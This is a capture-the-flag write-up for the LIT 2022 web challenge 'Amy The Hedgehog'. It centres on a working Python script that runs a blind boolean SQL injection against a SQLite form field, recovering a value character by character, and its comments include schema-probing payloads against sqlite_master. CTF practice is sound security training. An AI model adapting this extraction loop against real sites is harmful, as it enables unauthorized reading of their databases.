# LIT 2022

## web/Amy The Hedgehog

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FOOyYD1K7eKWbZnIMa55M%2Fimage.png?alt=media\&token=be033fba-3cd5-4ab3-849c-6069d7f0b664)

```python
import requests, string

# Challenge endpoint, plus one HTTP session that every probe reuses.
url = "http://litctf.live:31770/"
s = requests.Session()

# Characters confirmed so far; solve() appends to this module-level string.
passwordRetrieve = ""

# Probes used earlier against sqlite_master to read the table definition
# character by character (same boolean test as solve(), different source column):
# ' or (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type = 'table' AND tbl_name = 'names') = hex('some_char')--
# find column from table: ' or (SELECT hex(substr(sql,{index},1)) FROM sqlite_master WHERE type = 'table' AND tbl_name = 'names') = hex('{char}')--

# Candidate characters, tried in this order at every position: upper-case,
# lower-case, digits, punctuation (the double quote is not in the set), whitespace.
alpha = (
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
    "0123456789"
    "!#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~"
    " \t\n\r\x0b\x0c"
)
def solve():
    """Recover the `name` value one character at a time through a boolean oracle.

    For each position the function POSTs one probe per candidate in `alpha`,
    placing the probe in the `name` form field. A response body containing
    "You got it" is read as "the comparison was true"; the matching character
    is appended to the module-level `passwordRetrieve`.

    The loop runs 14 - 1 = 13 rounds; the writeup does not say where 14 comes
    from. A round in which no candidate matches does not advance the position,
    so the following round probes the same position again.

    NOTE(review): the probe can only act as an oracle if the server builds its
    SQL by concatenating the `name` field; binding that field as a query
    parameter would remove the true/false signal. In request logs this run
    appears as a burst of POSTs from one session whose `name` field carries
    `substr(` and `hex(`.
    """
    global passwordRetrieve
    position = 1
    rounds = 14 - position
    probe = "' or (SELECT hex(substr(name,{index},1)) FROM names) = hex('{char}')--"
    for attempt in range(rounds):
        for candidate in alpha:
            form = {'name': probe.format(index=position, char=candidate)}
            body = s.post(url, data=form).text
            if "You got it" not in body:
                # Miss: echo the rejected candidate and try the next one.
                print(candidate)
                continue
            # Hit: keep the character and move on to the next position.
            passwordRetrieve += candidate
            position += 1
            # "len:" shows the zero-based round number, not the recovered length.
            print("Nai here yr pass: ", passwordRetrieve, "  len:", attempt)
            break
# Runs the extraction as soon as the script is executed; every probe is a live POST to `url`.
solve()
```

* Xác định SQLite -> sqlite\_master -> tbl\_name -> column -> name
* [doc1](https://freetuts.net/lenh-select-trong-sqlite-1731.html)
* [doc2](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md#boolean---count-number-of-tables)

![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2F0T7hVW8cvGVn094OPPLn%2Fimage.png?alt=media\&token=f9049032-7015-4f3a-ae07-1891400b88be)
